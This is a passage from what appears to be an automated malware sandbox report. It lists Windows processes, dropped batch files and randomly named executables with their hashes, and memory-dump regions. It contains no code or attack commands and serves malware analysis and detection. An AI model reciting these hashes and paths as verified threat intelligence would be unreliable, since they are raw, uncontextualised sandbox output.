1⤵
PID:6016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1932

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:5756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5228

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:556

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1168

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:436

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:680

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4572

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
95e1c8db6eb5be60fa7c5f7ca36bfaed

SHA1
5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9

SHA256
3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18

SHA512
de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

Download Submit
C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat
Filesize
6KB

MD5
45f6bf2d3c1c47e445439b805929aae8

SHA1
9d2ba518dd058559bc1d690019bbed79c7cd5f85

SHA256
ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa

SHA512
902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64

Download Submit
C:\Users\Admin\AppData\Local\Temp\52C3.tmp\52C4.tmp\52C5.bat
Filesize
1KB

MD5
2b49f09f8e1785bf2e5c79d0f2bc7389

SHA1
05d68482ab1db17e11fef25fae270c3b784000ae

SHA256
706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

SHA512
ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3n5pkwo.hmk.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe
Filesize
94KB

MD5
40208a80f2b2155185d8a5bac4b9c367

SHA1
d7bf694f6046be8d6a882c86df12c1a35e26ab60

SHA256
cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16

SHA512
5ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621

Download Submit
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe
Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe
Filesize
89KB

MD5
a3b2fcf0c05bb385115894d38c2e6c44

SHA1
32cf50911381bbec1dad6aec06c2a741bd5d8213

SHA256
dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

SHA512
fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

Download Submit
memory/380-129-0x000001F44AAD0000-0x000001F44AAFB000-memory.dmp

Filesize
172KB

Download
memory/380-130-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/616-122-0x000001BC1CE50000-0x000001BC1CE7B000-memory.dmp

Filesize
172KB

Download
memory/616-119-0x000001BC1CE00000-0x000001BC1CE24000-memory.dmp

Filesize
144KB

Download
memory/616-123-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/664-125-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/664-121-0x0000021BA1560000-0x0000021BA158B000-memory.dmp

Filesize
172KB

Download
memory/744-138-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/744-137-0x0000025C8EF60000-0x0000025C8EF8B000-memory.dmp

Filesize
172KB

Download
memory/952-133-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/952-132-0x00000262969D0000-0x00000262969FB000-memory.dmp

Filesize
172KB

Download
memory/1048-140-0x0000020045D10000-0x0000020045D3B000-memory.dmp

Filesize
172KB

Download
memory/1048-141-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/1076-147-0x0000010D4B990000-0x0000010D4B9BB000-memory.dmp

Filesize
172KB

Download
memory/1076-148-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/1084-154-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/1084-153-0x0000025B4EF40000-0x0000025B4EF6B000-memory.dmp

Filesize
172KB

Download
memory/1224-150-0x0000020CC1B60000-0x0000020CC1B8B000-memory.dmp

Filesize
172KB

Download
memory/1224-151-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/1256-157-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/1256-156-0x000002DB0CEA0000-0x000002DB0CECB000-memory.dmp

Filesize
172KB

Download
memory/1344-160-0x000001992BFD0000-0x000001992BFFB000-memory.dmp

Filesize
172KB

Download
memory/1344-161-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp

Filesize
64KB

Download
memory/2380-90-0x0000000000820000-0x0000000000829000-memory.dmp

Filesize
36KB

Download
memory/2380-96-0x0000000076DC0000-0x0000000076FD5000-memory.dmp

Filesize
2.1MB

Download
memory/2380-93-0x0000000002700000-0x0000000002B00000-memory.dmp

Filesize
4.0MB

Download
memory/2380-94-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp

Filesize
2.0MB

Download
memory/2552-17-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2552-61-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2552-16-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2552-15-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2552-12-0x000001DFEAC30000-0x000001DFEAC52000-memory.dmp

Filesize
136KB

Download
memory/2552-14-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2552-13-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp

Filesize
10.8MB

Download
memory/2832-110-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-107-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-108-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-112-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-116-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-114-0x00007FFBC38F0000-0x00007FFBC39AE000-memory.dmp

Filesize
760KB

Download
memory/2832-109-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2832-113-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp

Filesize
2.0MB

Download
memory/4052-0-0x00007FFBA5583000-0x00007FFBA5585000-memory.dmp

Filesize
8KB

Download
memory/4052-1-0x00000000002E0000-0x00000000002E8000-memory.dmp

Filesize
32KB

Download
memory/5776-91-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/5776-85-0x00000000039F0000-0x0000000003DF0000-memory.dmp

Filesize
4.0MB

Download
memory/5776-86-0x00000000039F0000-0x0000000003DF0000-memory.dmp

Filesize
4.0MB

Download
memory/5776-87-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp

Filesize
2.0MB

Download
memory/5776-89-0x0000000076DC0000-0x0000000076FD5000-memory.dmp

Filesize
2.1MB

Download
memory/5776-42-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download